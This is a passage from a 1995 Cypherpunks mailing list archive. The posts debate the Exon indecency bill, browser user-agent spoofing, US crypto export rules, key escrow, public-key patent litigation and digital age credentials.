liabilities (real or forged) from the bank than its capital. There may be other indirect costs resulting from dislocations, but these should also be proportional to the size of the bank. Therefore your argument is really against centralization and for diversification and distribution. Wei Dai From llurch at networking.stanford.edu Wed Dec 6 11:56:32 1995 From: llurch at networking.stanford.edu (Richard Charles Graves) Date: Wed, 6 Dec 95 11:56:32 PST Subject: Note on "Barring Netscape" Message-ID: <199512061957.LAA05418@Networking.Stanford.EDU> The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22 (compatible" to hte server, which triggers an incorrect response from, e.g., www.c2.org. This little fraud has the potential to make you look silly if left unexplained. If you get the string "compatible;" (or Compatible;?), you should instead pop up Netscapisms that show that Microsoft is lying. Or maybe Billisms. , which affects only MSIE, might be appropriate. -rich From attila at primenet.com Wed Dec 6 12:30:13 1995 From: attila at primenet.com (attila) Date: Wed, 6 Dec 95 12:30:13 PST Subject: News on Congressional Debate on Exon In-Reply-To: Message-ID: well, there goes the neighborhood. guess I better clean up my www front page which meets the Exon rules on indeceny, pisses on ITAR, and is probably seditious as well. might as well get a start on it before the eager beavers hemorrhage! the House contingent were all of the Exon persuasion to begin with and subject to threats by the Christian Right. The real test is whether the full House will sign on --a real test on Newt's professed 'Freedom of the Net' policy! If Newt keeps his resolve, can he again raise the 424-4 margin he had for the Wyden amendment? Tune in for the exciting fireworks next week or so for House action.... yeah, right! and as a last resort, Clinto has vowed to veto the bill for two reasons: the open season privileges for big business to consolidate all telecommonications into a few empires, and the lack of regulation to control same. Maybe now that Hillary is not out front, maybe Bill will find his balls, or maybe he will waffle again.... ------- On Wed, 6 Dec 1995, Timothy C. May wrote: > > I just heard (12:15 EST) that the House has adopted language similar to the > original Exon-Coates language in the Senate (as opposed to the White > language, which was less restrictive in that it dealt with material that > was "harmful" to children, interpreted to mean child porn). > > It looks like Internet Service Providers will soon be held liable for > "indecent material" passed by their systems. I would expect most ISPs will > drop the alt.binaries.* newsgroups as a first step, and maybe other groups > as well. > > (Controlling Web page accesses is a much tougher problem, of course. so I > wouldn't expect much action on this at first.) > > By the way, I recently discovered a new twist on "age credentials": the use > of credit cards to prove age. One image site is asking for a "valid credit > card number" to be given...not to use for charges, but just to do a quick > verification (they claim a few minutes or less) that the card is valid and > in the name of the person accessing their site. > > Some obvious security issue. An interesting twist, though. > > If the Exon Bill really does go into effect, and age limits on access are > imposed, I'll be looking for what we've always joked about: the > "Information Superhighway Driver's License." > > --Tim May > > Views here are not the views of my Internet Service Provider or Government. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > > From drcharpe at hamlet.uncg.edu Wed Dec 6 12:38:15 1995 From: drcharpe at hamlet.uncg.edu (DANIEL CHARPENTIER) Date: Wed, 6 Dec 95 12:38:15 PST Subject: PGP In-Reply-To: Message-ID: > you really ought to be more thoughtful about what and how you write on > the cypherpunks list... The how is referring to not double spacing isn't it. Sorry, I've been up for the last couple of days and didn't even realize it. What do you mean what I write about? > > anyway, the PGP code from MIT should compile on nearly all unix > machines. i'm not sure it will compile with a g++ compiler though. all > unix type machines should have uncompress, tar, (g)cc. just get the > source from MIT. I am not an idiot. I must have downloaded PGP from about 20 million different places. They are all either missing files, some times the darn code won't compile, or when I "tar xvf" half of the files bring up an error and the computer says it can not create the file. I'll try the address that you've sent. Hopefully I will have better luck. In the persuit of constructing a stable cryptographic program that uses PGP what features should be included. Obviously all of the ones that PGP has and encrypting/decrypting e-mail but what else? From trei at process.com Wed Dec 6 12:40:55 1995 From: trei at process.com (Peter Trei) Date: Wed, 6 Dec 95 12:40:55 PST Subject: News on Congressional Debate on Exon Message-ID: <9512062040.AA20810@toad.com> > (Controlling Web page accesses is a much tougher problem, of course. so I > wouldn't expect much action on this at first.) > > By the way, I recently discovered a new twist on "age credentials": the use > of credit cards to prove age. One image site is asking for a "valid credit > card number" to be given...not to use for charges, but just to do a quick > verification (they claim a few minutes or less) that the card is valid and > in the name of the person accessing their site. > Timothy C. May | Crypto Anarchy: encryption, digital money, Actually, I've been thinking about this quite a bit recently. I'm building an SSL enabled server, and clent-side authentication may provide some help. I could see a user getting his or her public key certificate signed with different CA keys which assert any number of conditions, such as: Key holder was born before (some particular date). Key holder has access to sales data for XYZ corp. Key holder is an adult who takes the first amendment seriously. ... and the server would recognize different CA signatures as permitting different levels of access. If your browser permitted you to select the key certificate used in setting up the encrypted link (and different certs or sets of certs could be protected with different passphrases), then Mom or Dad could use their I-am-an-adult credential to read www.xxx.com, while Junior could not. There *is* a loss of anonymity in this scheme, however. I realize that digital credentials are old hat on this list. The point I am making is that the pieces for doing this are here - we just need to assemble them. (This is not to suggest that I am in favor of Exon/Coates in any way - I am not. ) Speaking for myself alone.... Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From tcmay at got.net Wed Dec 6 12:41:42 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 12:41:42 PST Subject: News on Congressional Debate on Exon Message-ID: At 8:31 PM 12/6/95, attila wrote: > well, there goes the neighborhood. > > guess I better clean up my www front page which meets the Exon rules on >indeceny, pisses on ITAR, and is probably seditious as well. might as >well get a start on it before the eager beavers hemorrhage! In case anyone's worried about the short-term implications, you'll all have plenty of time before enforcement starts. The conference committee has to OK the final form, voting, etc., then the Prez has to sign it (or pocket veto it, which is unlikely in the extreme). I'm no longer current on schedules as I was in high school civics class, but I think it will take effect some weeks or months after being signed into law. And even then I think prosecutions will take a while to get rolling, as cases are considered. It's not as if overnight the cops will be raiding sites. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rmartin at aw.sgi.com Wed Dec 6 12:46:51 1995 From: rmartin at aw.sgi.com (Richard Martin) Date: Wed, 6 Dec 95 12:46:51 PST Subject: Note on "Barring Netscape" In-Reply-To: <199512061957.LAA05418@Networking.Stanford.EDU> Message-ID: <9512061547.ZM8340@glacius.alias.com> -----BEGIN PGP SIGNED MESSAGE----- On Dec 6, 11:57am, Richard Charles Graves wrote: > The Microsoft Internet Explorer sends the user-agent "Mozilla 1.22 (compatible" > to hte server, which triggers an incorrect response from, e.g., www.c2.org. > This little fraud has the potential to make you look silly if left unexplained. this *is* fraud, in a way. Microsoft is shipping a product which in a certain exchange claims to be a product of another company. Microsoft's software is being treated better around the net because it is recognised as Netscape, which it isn't. It would be somewhat like me walking through the short line at Heathrow as a EU citizen even though I'm actually a Canadian citizen. If Microsoft had used "MSIE 1.0 (...)", then they would have to gain "market share" in convincing the web that their browser is worth writing content for. As a side note, there are suggestions that httpds should be a little more intelligent about HTML, recognising which clients can handle which versions of html [so that they would ship 1.0 to those which can handle 1.0, 2.0 to those which think they can handle 2.0, and perhaps we have a 2.0-netscape-ENHANCED-ha-ha-ha]. If this were to be encouraged by both httpd creators and client creators, with both sides being honest, then uSoft would not need to claim to be shipping Netscape. They could just say html-2.0-microsoft-ENHANCED-ow-my-sides [e.g.] and servers could check the 2.0 and pay attention to the rest if they wished. [On a side note, if all governments decided to close up shop tomorrow, many people on this list would be happy. Which is more likely?] http, from my meagre understanding, is supposed to be a negotiation (among other things) with both sides agreeing on what the client can handle and what the server can offer. Perhaps Microsoft could be encouraged to be honest about what they are shipping. (I don't doubt that other clients may also lie about who they are.) richard ps - Life might be a lot easier for everyone on the web if Netscape forced uSoft software to be honest about what it is. ObBarelyCrypto: Do our *browsers* now have to start authenticating themselves? - -- Richard Martin I DON'T SPEAK FOR ALIAS|WAVEFRONT Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMYBVB1gtCYLvIJ1AQEi3gP+IqWbKqk6MTKviGMRw5ZKde+9BQ/iQOIA jrrDXEZQIdwHBeeATOzqYFVzVxi5bQFgLPCt/kNTsyARwQbLGQ54HuR57qPX4EOm d0d2A7oL4qsFwGvmETP4HlBQy10e5vKqM/7pLZl0s9cE/a3kWeZq+XCS4oBKHDtF alTjxYClsAg= =hOc9 -----END PGP SIGNATURE----- From pete at loshin.com Wed Dec 6 12:46:54 1995 From: pete at loshin.com (Pete Loshin) Date: Wed, 6 Dec 95 12:46:54 PST Subject: Inherent Insecurity of Internet Commerce! (was RE: Secret Clearance) Message-ID: <01BAC3F2.3D4F0240@ploshin.tiac.net> OK, I'll try again. First, as I recall, SECRET clearance is actually not very high: when I got it, I had to answer a bunch of questions (do you abuse illegal drugs? are you now or have you ever been a member of any organizations? have you ever been _arrested_ for anything?) and fill out some forms and get fingerprinted. They probably did a credit check, and that was about it. Nobody I knew got any calls asking about my habits (that is reserved for higher clearances). So now I'll rename the thread again: "Inherent Insecurity of Internet Commerce" -- maybe now the NYT will feature me on the front page for "discovering" this inherent flaw in the Internet. My purpose in renaming the thread in the first place was to start another thread relating to the types of security in places like, say, Netscape or Spyglass or CyberCash or First Virtual or Interramp or any other ISP or software company. Because I want to know how susceptible these companies are to hiring the wrong people. So, here's the "bug": if some agency of crime/espionage wants to subvert any of these systems, all they need do is employ the same blackmail/bribe techniques used to recruit actual spies on some employees of these companies. They then slip in some hacked versions of the software with the good ones, or modify distribution servers, or slip code into servers that forwards every tenth credit card number somewhere. Or how about getting a janitor to plug a wireless tap into one of the major Internet backbones to sniff for cc#s as well as interesting e-mail? Also, since there's enough noise here already (and even I don't see that much crypto-relevance) I won't post again on this topic, but I am very interested in hearing concrete examples of how Internet companies are protecting themselves, and also in hearing about specific instances of security failing (e.g., has anyone ever found a tap on a backbone?) -Pete Loshin pete at loshin.com From vanhorn at hks.net Wed Dec 6 12:49:17 1995 From: vanhorn at hks.net (Kevin S. Van Horn) Date: Wed, 6 Dec 95 12:49:17 PST Subject: News on Congressional Debate on Exon Message-ID: <199512062048.PAA15070@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- tcmay at got.net (Timothy C. May) wrote: > >I just heard (12:15 EST) that the House has adopted language similar to the >original Exon-Coates language in the Senate I consider it unlikely in the extreme that this passed without Gingrich's sanction. So I guess the Newt's much-publicized opposition to the Exon amendment was just a show. - --------------------------------------------------------------------------- Kevin S. Van Horn | Uncle Sam needs YOU! vanhorn at atext.com | But not vice versa. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMYBmCoZzwIn1bdtAQE9lwGA1w4SUuzkxqcrIWu2EJq65rspqg7PVL6Y FcMbibELAnFrZOUKNVtQNXxtpfaItIGR =QI3W -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Wed Dec 6 12:53:03 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 6 Dec 95 12:53:03 PST Subject: No More Netscape Comments from Me In-Reply-To: <199512061647.LAA12675@jekyll.piermont.com> Message-ID: "Perry E. Metzger" writes: > Robert Hettinga writes: > > >So, have fun riding the Great Internet Bubble of 1995! > > > > Yeah... I wonder what the price of Netscape puts around, say, March are > > these days... > > No conventional options are available on Netscape yet. The price on > custom options is high, and you have to trade a very large (quarter to > half million dollar) sum in order to get them. But you can already sell it short. (I.e., you sell shares of Netscape now for future delivery, hoping that before the time you must deliver them, the price will go down and you'll be able to buy the shares to cover the sale at a lower price than you sold them for.) Someone I know sold a bunch of Netscape short about the time the various cracks were announced on this mailing list. Unfortunately for him, the price didn't go down. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rsalz at osf.org Wed Dec 6 13:18:46 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 6 Dec 95 13:18:46 PST Subject: Solution for US/Foreign Software? Message-ID: <9512062117.AA00306@sulphur.osf.org> You would not be allowed to export a browser where the crypto library is a dynamically-loaded library. If you wrote a "browser toolkit", you would have to take special care to hide even the names of the crypto functions in the library symbol table. If you want to do offshore crypto development, your best bet is to document the required interfaces and protocols in a publication which is available to anyone, as this is supposedly protected by the First Amendment. On the other hand, I encourage you to try to do otherwise. /r$ From tallpaul at pipeline.com Wed Dec 6 13:22:47 1995 From: tallpaul at pipeline.com (tallpaul) Date: Wed, 6 Dec 95 13:22:47 PST Subject: Kim Philby in Washington Message-ID: <199512062123.QAA25167@pipe3.nyc.pipeline.com> Burgess, Philby, and Maclean in Washington A Comment on Clipper and G.A.K. It is historically indisputable that Guy Burgess, Harold "Kim" Philby, and Donald Maclean were agents for Soviet intelligence. What is far less known is the role that these three individuals played in the U.S.A. and how this related to their access to U.S. secret material. Maclean, at one time, was the Head of Chancery of the British Embassy in Washington D.C. As such, he was the head of the code room at the Embassy and thus had access to *all* encrypted traffic passing through the Embassy. This included everything available through the considerable Anglo-U.S. co-operative ventures during the immediately-post W.W. II period. Guy Burgess was also assigned to the British Embassy where one job was as a liaison agent with the U.S.A. It has been reported during this period that he had a pass from the Atomic Energy Commission that gave him 24-hour-a-day access unaccompanied by any U.S. "overseer." This was a higher level of A.E.C. security than held by J. Edgar Hoover at the time. Kim Philby was the U.K.'s liaison to the Central Intelligence Agency. He was personally close ("a drinking buddy") to then head of C.I.A. Counter-Intelligence James Jesus Angleton. Angleton was, to all accounts, a psychopathologically paranoid individual, seeing Soviet spies and disinformation attempts in almost all areas of life with the exception of his one-time bar companion. He might be likened to one of those hysterical Victorian "feminists" who thought "all men are pigs" with the exception of one real gentleman she knew. (The gentleman would, of course, be Jack the Ripper.) I write this not out of any sense that Key Escrow or Clipper are "communist plots." Far from it, especially during this period. But the presence of Burgess, Philby, and Maclean in Washington shows how unable the governments have been to protect their own secrets. It is unreasonable to suggest -- as do supporters of Clipper and G.A.K. -- that governments will be any better protecting ours. --tallpaul  From thad at hammerhead.com Wed Dec 6 13:24:11 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Wed, 6 Dec 95 13:24:11 PST Subject: Roger Schlafly's court hearing today Message-ID: <199512062111.NAA01734@hammerhead.com> Roger Schlafly had a brief hearing this morning in Judge Williams federal court on summary judgements with respect to the validity of the various public key patents, and alleged anti-trust and unfair trade practices. Bob Wells and I were the only pro-tossing-the-patents out people there, although sometimes-cypherpunk-meeting-attender Whit Diffie was there as well. The judge said right at the outset that he would not be making a decision today, that he wanted guidance from Roger and the other sides lawyers about the relevant issues, to help him wade through the tremendous amounts of documentation provided. I suppose that this could be expected, but the issues here seemed to me, at least, to be relatively clear-cut. There were basically four issues to be discussed, the Diffie-Hellman, Hellman-Merkle, and RSA patents, and these unfair trade practices. The judge had only allocated an hour for this discussion, and then showed up 20 minutes late, which proved inadequate. Still, I thought that everyone was remarkably clear and concise with their answers, and the judge asked reasonable questions. First discussed were the unfair trade practices, where the lawyer for what used to be PKP dragged in a lot of dirty laundry from the past, describing why Roger got interested in this in the first place. I don't understand what the complaint here was, the PKP lawyer said that since Roger didn't have a product, what was he complaining about, anyway? It seemed like an odd defense to me, but again, I don't know exactly what Roger's complaint was. Roger agreed with the judge that yes, everything he wanted to say was in his submission. Next discussed was the Diffie-Hellman patent. Roger stated that he had four clear instances where the an "enabling disclosure" was made about Diffie-Hellman; three were presentations to large audiences, and one was a pre-print of the famous "New Directions in Cryptography" paper. Roger actually had the viewgraphs that Diffie used in his presentations. These disclosures were all made more than 1 year before the patent was filed, which is the limit in the US. The lawyer from CalCan (something like that) handled this one. He said that the law specifically mentioned publication, and that none of these was a publication. I'm not sure what the law says, and Roger disputed the claim that that is what the law says. Disappointingly to me, it appears that neither Diffie or Hellman have any recollection of when, to whom, or how many preprints of the article were sent out. It's terrible how the law seems to cloud people's minds, isn't it? What little I do know about patent law tends to support Roger on this one, I think that it should be an open and shut case, but we'll see. Then we came to the Hellman-Merkle patent, which basically claims all of public-key cryptography. Roger's claim here was that the mechanism described doesn't work, because knapsacks don't work, that is, the invention is supposed to make generation of the decryption key infeasable, by a very specific description of infeasability in the claims of the patent. (10^30 arithmetic operation necessary) Well, that's not true. The same lawyer for the other side took this on two different ways: 1) that nobody knew that knapsacks were insecure at the time that the patent was filed, how could the patent be found invalid based on something that happened later 2) and some variations (dense, iterated knapsacks) might still be secure. Roger presented an analogy. Say someone was able to persuade the patent office that a drug cured cancer, and so he was able to obtain a patent on it. Later, it was found that the drug killed everybody who took it. Should the patent be valid, if it really didn't do what it said that it would? Roger could have gotten melodramatic, and said that bad cryptography could really kill people, and has many times, but he didn't; as I said, everybody was remarkably concise and to the point. Even so, we were out of time here, not having discussed the RSA patent or the Schnorr patent at all. The judge said that he will call another hearing if he feels that it is required. I thought, in my incredible naivete, that it went really well for Roger, although I didn't have time to hang around and ask him how he thought it went. I think that his arguements are good, and if the law is sensible he will prevail. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-2244 From sjb at universe.digex.net Wed Dec 6 13:24:47 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Wed, 6 Dec 95 13:24:47 PST Subject: NIST GAK export meeting, sv In-Reply-To: <199512060335.EAA20054@utopia.hacktic.nl> Message-ID: <199512062125.QAA14673@universe.digex.net> Anonymous writes: >What >troubles me is the suggestion that *every* agent *must* hire someone who >might answer to a higher authority, as it were. And what troubles me more >is watching this paragovernment's transparent efforts to reproduce itself >step by step, always trying to elude efforts to make it accountable or >subordinate to civil authorities. Whoa. Time-out. Having a SECRET clearance does not imply that one is answerable to the government. You don't get a clearance independent of a job. You have to be hired for the job, then the investigators look for anything that might disqualify you, then you get the clearance. A key-escrow company could hire anyone they want. Assuming that they're approved for a SECRET billet when they're approved as an escrow agent, the *company* designates the individual the government is to investigate. The only leverage the government really has is the right to take the clearance away. The person (and probably the company) could sue for its return if it was really done as a pressure tactic. The guidelines for approving or denying such clearances are pretty specific. From jimbell at pacifier.com Wed Dec 6 13:40:05 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 6 Dec 95 13:40:05 PST Subject: Solution for US/Foreign Software? Message-ID: > >> I'm not saying they are a "bypass" of the laws. Rather, I'm saying that >> if the goal is to: >> >> 1. Let companies like Netscape make foreign sales. >> >> 2. Still comply with the letter of the law. > >It takes more than one or two people to coordinate an international effort. >Once more than a few people know about it, it becomes "company policy" or >"corporate objective", in which case, the NSA/DoS will eventually figure it >out and start levying heavy fines and jailing the individuals. You miss the point! There will be no "international effort"! Here are the steps: 1. Write a program limited to keysize, carefully constructed to isolate those portions of the program which define key size, GAKedness, etc. 2. Get it export approved. Export it. THEN 3. Announce that a "US-only" version of the same program is being released, and include the minimal component which replaces the limited software. Release it, only in the US of course! >The main point is that there is no such thing as the "letter of the law". >What they enforce is much broader than that, and how they enforce it is much >more subtle than clear-cut criminal prosecution. Therefore, you cannot just >use literal loop holes just because it's not clear, because the law they are >enforcing is not clear either. The system I describe doesn't even violate the spirit of the rules. If anything, it bends over backward to implement a foreign version of the software which ALREADY is export-approved at the time it was, um, upgraded. True, it's possible to sneak the extra component out of the country, but hey, it's also possible to sneak an entirely new program out of the country. I'm not suggesting that the company who writes the component takes it out, it'll happen regardless. If the order of the versions was reversed, the USG might complain that the export version was "too similar" to the domestic version. That's why you wait for the export approval before you write the domestic version. From rogaski at phobos.lib.iup.edu Wed Dec 6 13:41:41 1995 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Wed, 6 Dec 95 13:41:41 PST Subject: SKIP Message-ID: <9512062140.AA14601@phobos.lib.iup.edu.> -----BEGIN PGP SIGNED MESSAGE----- Can anyone remember the URL for SKIP for Solaris, that little piece of paper has become a victim of the clutter ... - ----- Mark Rogaski 100,000 lemmings rogaski at phobos.lib.iup.edu aka Doc, wendigo can't be wrong! http://www.lib.iup.edu/~rogaski/ VMS is as secure as a poodle encased in a block of lucite ... about as useful, too. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMYNYx0c4/pqJauBAQHPFwQAoG6wtJJsq9QJB2MU02G08Vo436jK0sZs XscSvlpKUtYbyJORj4ETVdfDAAoyQdjZFQQTeH4vt413DPbmqgwKs+QnBrI49evv UjhmcGvxFMj8DpkxiL+5ANu6nrzLWM9smUDWlpKTa3HN59Kq5shlHIlp+yo6AH08 AIInsCZh+YU= =jUrp -----END PGP SIGNATURE----- From markm at omni.voicenet.com Wed Dec 6 13:44:16 1995 From: markm at omni.voicenet.com (Mark M.) Date: Wed, 6 Dec 95 13:44:16 PST Subject: GAK In-Reply-To: <6615943A01502C79@-SMF-> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On 6 Dec 1995, Scott Binkley wrote: > I heard a while back about being able to "split" up a PGP key. What > about > splitting up the key into many parts, and giving them out to multiple > INDEPENDANT > agencies. ie: One piece goes to the FBI, one to the NSA, one to some > other committee, and > so on. That way, no goverment body could just tap your conversations > without getting > approval from others, and gaining the pieces of your key. > > just a thought > > This is exactly how the clipper works. The unit key is XORed with 160 random bits, the result is given to one government agency, and the random bits are given to another agency. The largest concern I have about wiretapping is not so much that some corrupt law enforcement agents will wiretap me out of malice, but that if I communicate with someone who is being wiretapped, my end of the conversation will be heard as well. I might be giving out sensitive information to some government agent without ever violating any laws and without any reason for the government to believe that I was a criminal. For this reason, I believe that cryptography should not be regulated. I would never trust the government with any of my decryption keys. finger markm at voicenet.com for Public Key http://www.voicenet.com/~markm/ Key info: 0xF9B22BA5 bd24d08e3cbb53472054fa56002258d5 - -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+ b+++ DI+ D++ G+++ e! h* r! y? - ------END GEEK CODE BLOCK------ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMYO4rZc+sv5siulAQHsDAP/dWDLQouo5dx7kZp4wTOFJGB1v3T6Pi8v FuAr7+k1ZfYDeD4J8+Hehrrm8JrPv0MBT9Bg8y560PSt9+9E8rShngH3p2ldYv8q 7XDX81bwJY5wrqweE97duQKmH3l0jTXb/7UMi+R7ESOCmLBhywhDCOO0SRlc3NIQ xK5ty/F90YI= =aQX+ -----END PGP SIGNATURE----- From pmonta at qualcomm.com Wed Dec 6 13:53:18 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Wed, 6 Dec 95 13:53:18 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment) In-Reply-To: Message-ID: <199512062154.NAA20063@mage.qualcomm.com> Wei Dai writes: > > [ infinite-cost risk ] > > ... > The direct cost of a break-the-bank catastrophic failure is bounded by the > amount of capital the bank has. This is because the market will not > accept more liabilities (real or forged) from the bank than its capital. > There may be other indirect costs resulting from dislocations, but these > should also be proportional to the size of the bank. Therefore your > argument is really against centralization and for diversification and > distribution. Why "the bank", rather than "all banks"? If there is a single cryptographic point of failure in a widely used ecash system, it seems unlikely that diversity would buy you anything. The worry would not be the compromised keys of a single bank, but rather, say, an effective cryptanalysis. I would put this in the supernova class; it may be just as unlikely. Peter Monta From m.landicho at biology.bbk.ac.uk Wed Dec 6 14:06:42 1995 From: m.landicho at biology.bbk.ac.uk (Mary Rose) Date: Wed, 6 Dec 95 14:06:42 PST Subject: unsuscribe Message-ID: unsuscribe From llurch at networking.stanford.edu Wed Dec 6 14:22:48 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 6 Dec 95 14:22:48 PST Subject: Cyberia-L Archive [was Re: ERA_sur] Message-ID: As somebody pointed out to me, Cyberia-L, like cypherpunks, is archived on http://www.hks.net/ and the public news server nntp.hks.net. Now send them some of the money you're going to make from the stock market. -rich From tcmay at got.net Wed Dec 6 14:24:36 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 14:24:36 PST Subject: News on Congressional Debate on Exon Message-ID: This is a VERY positive idea! At 3:54 PM 12/6/95, Peter Trei wrote: >Actually, I've been thinking about this quite a bit recently. I'm building >an SSL enabled server, and clent-side authentication may provide >some help. I could see a user getting his or her public key certificate >signed with different CA keys which assert any number of conditions, >such as: > >Key holder was born before (some particular date). >Key holder has access to sales data for XYZ corp. >Key holder is an adult who takes the first amendment seriously. > >... and the server would recognize different CA signatures as permitting >different levels of access. This is something that could get two things done: 1. Protect ISPs and Web sites from claims they aren't taking any steps to block children. (I won't get into the "children should be allowed to appreciate the beauty of the human body" issue, just noting that an ISP or Web site could deny access to account holders under 18, or over 30, or whatever he wants to do.) 2. Get wider currency for the concept of digitally signed credentials, especially if these are _blinded credentials_, where the credential is for an age, say, and not an identity. (Standard Chaumian stuff, though likely to be nontrivial to implement.) >If your browser permitted you to select the key certificate used in >setting up the encrypted link (and different certs or sets of certs >could be protected with different passphrases), then Mom or Dad >could use their I-am-an-adult credential to read www.xxx.com, >while Junior could not. There *is* a loss of anonymity in this scheme, >however. There may be ways around the loss of anonymity. Ideally, with blinded credentials, But in the short term, through Web proxies and/or servers. For example, Sameer's c2.org could issue accounts to people who can prove they are over 18 (notarized copies of birth certif., passport, etc.). Sameer's system would then have a credential saying "this account name is over 18." (There is of course little that can be done about people who lend their accounts to minors, absent any effective biometric security measures. No current system, certainly not Exon-Coates, can deal with this.) >I realize that digital credentials are old hat on this list. The point I am >making is that the pieces for doing this are here - we just need to >assemble them. > >(This is not to suggest that I am in favor of Exon/Coates in any way - >I am not. ) I think this could be quite a good project, provided it is not trying to be all things to all people. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sjb at universe.digex.net Wed Dec 6 14:28:05 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Wed, 6 Dec 95 14:28:05 PST Subject: Solution for US/Foreign Software? In-Reply-To: Message-ID: <199512062229.RAA16714@universe.digex.net> Timothy C. May writes: >Yes, I read your proposal. The "hooks" term is not my coinage, but refers >to this general idea. I urge you to read what others, including companies, >have had to say on this matter. Much of the debate on "interoperability" >revolves around details of entry points to crypto modules and such hooks. > >No point in arguing with Jim on this anymore, so I won't. I agree. It does bring to mind an idea, though. Netscape builds an exportable system by choosing a random 128 bit number and then just including 88 bits of it in plaintext. This means one of two things. Either there's a field which holds the "key", but the export version stores 88 bits plain + 40 bits cipher, and knows this structure, or there's a field which holds the 128 bit enciphered key, and a second field which holds the 88 bits of plaintext key. In the latter case, a patch which modifies the code which stores the 88 bit plaintext field to write all zeros would be almost trivial. Just over-write the store instructions with noops, most likely. In the former, the patch would be more significant, but still possible. You'd disable the "write the plain" part and extend the "decode the cipher" part to decode all 128 bits --- probably just a loop test. Either patch for a given system should require less than a page of explanation. I wonder how the ITAR would view this. From nobody at REPLAY.COM Wed Dec 6 14:30:30 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 6 Dec 95 14:30:30 PST Subject: Civilizing Cyberspace (book note) Message-ID: <199512062231.XAA27734@utopia.hacktic.nl> Forward: Steven E. Miller, a member of the national board of directors of Computer Professionals for Social Responsibility, has published a new book, *Civilizing Cyberspace: Policy, Power and the Information Superhighway* (Addison Wesley, 1995, 413 pages). This is the best book I have seen on the public policy debates surrounding the information superhighway. It covers all aspects of this debate, including democracy, citizenship, community networks, privacy, intellectual property, competing models of the NII, universal service, equity, freedom of expression, protecting the public interest, encryption, and so on. Highly recommended for anyone interested in this subject, or for use as a text in classes. Gary Chapman, Coordinator, The 21st Century Project LBJ School of Public Affairs, University of Texas, Austin From m5 at dev.tivoli.com Wed Dec 6 14:35:02 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 6 Dec 95 14:35:02 PST Subject: Solution for US/Foreign Software? In-Reply-To: Message-ID: <9512062236.AA01307@alpha> jim bell writes, carefully avoiding the "Return" key: > 1. Write a program limited to keysize ... > 2. Get it export approved. Export it. If you do step 1, then step 2 is impossible. If your application is constructed such that a non-export-approvable cryptosystem can be dropped on top, then you will not get export approval. (I know this from our direct experience here.) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From llurch at networking.stanford.edu Wed Dec 6 14:41:25 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 6 Dec 95 14:41:25 PST Subject: Press Release on Response to Microsoft Internet Announcements Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I just posted the following from stanford.edu; it probably won't be approved and propagated in time, though. By the way, alt.internet.media-coverage, to which someone pointed me, is explicitly *not* for press releases. I do not plan to utter the string "cypherpunks at toad.com" because I think there's enough noise here already (some from me). Apologies to sameer for being presumptuous, but I did say "hope," and I also think tomorrow would be a really good time to document the .PWL file bugs... - -rich - ---------- 